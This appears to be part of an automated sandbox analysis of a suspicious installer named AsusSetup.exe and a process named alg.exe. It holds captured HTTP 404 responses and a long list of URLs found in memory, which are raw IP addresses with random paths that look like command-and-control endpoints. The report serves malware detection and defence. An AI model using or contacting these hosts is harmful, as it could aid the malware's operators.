Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:37:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Mon, 28 Oct 2024 15:38:18 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:38:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:38:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: alg.exe, 00000002.00000003.2259686335.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointDataInsiderSlabBehaviorReportedBuildInsiderSlabBehaviorS
Source: officesvcmgr.exe.2.drString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
Source: alg.exe, 00000002.00000003.2315080922.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000002.00000003.2314597363.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2315969430.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ttxmcyeqta
Source: alg.exe, 00000002.00000003.2334093513.000000000056B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/xndhuecwgokoeqkO
Source: alg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2053760882.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2030058504.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2029468928.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/nxomllvrieoyP
Source: alg.exe, 00000002.00000003.2408163435.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2382821166.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2397532552.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/sxtbjbwlxwcwoP
Source: alg.exe, 00000002.00000003.2115106603.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/tjrtnokwwlpftv
Source: alg.exe, 00000002.00000003.2315080922.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2314787217.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/ttxmcyeqta
Source: alg.exe, 00000002.00000003.2334946770.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/xndhuecwgokoeqk0.N?.N
Source: alg.exe, 00000002.00000003.2174197488.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/vr
Source: alg.exe, 00000002.00000003.2223981210.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2213279383.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2177767483.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212486448.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2178627316.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2199212734.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/euqwoqqat
Source: alg.exe, 00000002.00000003.2177767483.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2178627316.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/vrunpbg
Source: alg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/yhrktnvbm
Source: alg.exe, 00000002.00000003.1776391888.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1776573627.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1775486594.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/uyurjsjwfnxwTiP
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/.
Source: alg.exe, 00000002.00000003.1740350892.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/6
Source: alg.exe, 00000002.00000003.1740350892.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/J
Source: alg.exe, 00000002.00000003.1738763339.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aay
Source: alg.exe, 00000002.00000003.2242147982.000000000052D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000052D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/pyamvnfeng
Source: AsusSetup.exe, 00000000.00000003.1738814075.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1728259362.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/spoyvi
Source: AsusSetup.exe, 00000000.00000003.1738814075.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1728259362.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/spoyvivd
Source: alg.exe, 00000002.00000003.2289940896.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2299023378.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2298057328.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2288526929.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2278014771.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/i0
Source: alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/pyamvnfeng
Source: alg.exe, 00000002.00000003.1791243483.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1793031401.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/qmxhsynps
Source: AsusSetup.exe, 00000000.00000003.1728259362.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1738814075.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/spoyvi
Source: alg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2053760882.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/ws0
Source: alg.exe, 00000002.00000003.2297664330.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/kjptihxae
Source: alg.exe, 00000002.00000003.2250267655.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/txmgarlp
Source: alg.exe, 00000002.00000003.2334946770.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2315080922.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2299023378.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2298057328.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2314787217.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/kjptih
Source: alg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2146856016.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2136321596.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2115106603.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2147112358.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2098701280.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2097510796.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/tocvykftorkpniP
Source: alg.exe, 00000002.00000003.2251645473.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/txmgarlpAdobe
Source: alg.exe, 00000002.00000003.2288526929.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2289940896.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/
Source: alg.exe, 00000002.00000003.2288078028.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/ckhsjhaxaevpxtd
Source: alg.exe, 00000002.00000003.2431141671.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2434579846.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2419686924.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2421030426.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/akhgyldyrj
Source: alg.exe, 00000002.00000003.2289940896.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2288526929.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/ckhsjhaxaevpxtdP
Source: alg.exe, 00000002.00000003.2199212734.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/nmaggyam
Source: alg.exe, 00000002.00000003.2098701280.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2097510796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/yhdmpa
Source: alg.exe, 00000002.00000003.2449027228.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2431141671.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2434579846.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/wrdfsvwlxwcwoP
Source: alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/dneetrunpbg
Source: alg.exe, 00000002.00000003.2408163435.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2419686924.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2421030426.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/jfrndoN
Source: alg.exe, 00000002.00000003.2408163435.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2431141671.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2347309628.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2421030426.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2434579846.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2382821166.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2343746769.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2410586771.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2288526929.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2367385189.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2331458279.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2278014771.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2289940896.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2419686924.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2299023378.000000000055F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000055E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2260827027.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/cmntnmriuw
Source: alg.exe, 00000002.00000003.2343746769.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2347309628.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/yyjnpedbcl
Source: alg.exe, 00000002.00000003.2115106603.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2098701280.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2097510796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/cxtfkubsyhri
Source: alg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/ckfgkmbjfmpkxgrrobat
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/6
Source: AsusSetup.exe, 00000000.00000003.1740569192.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/b
Source: alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rdbyhsstwxr
Source: alg.exe, 00000002.00000003.2260497253.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/vbtgsklxqvsc
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrs
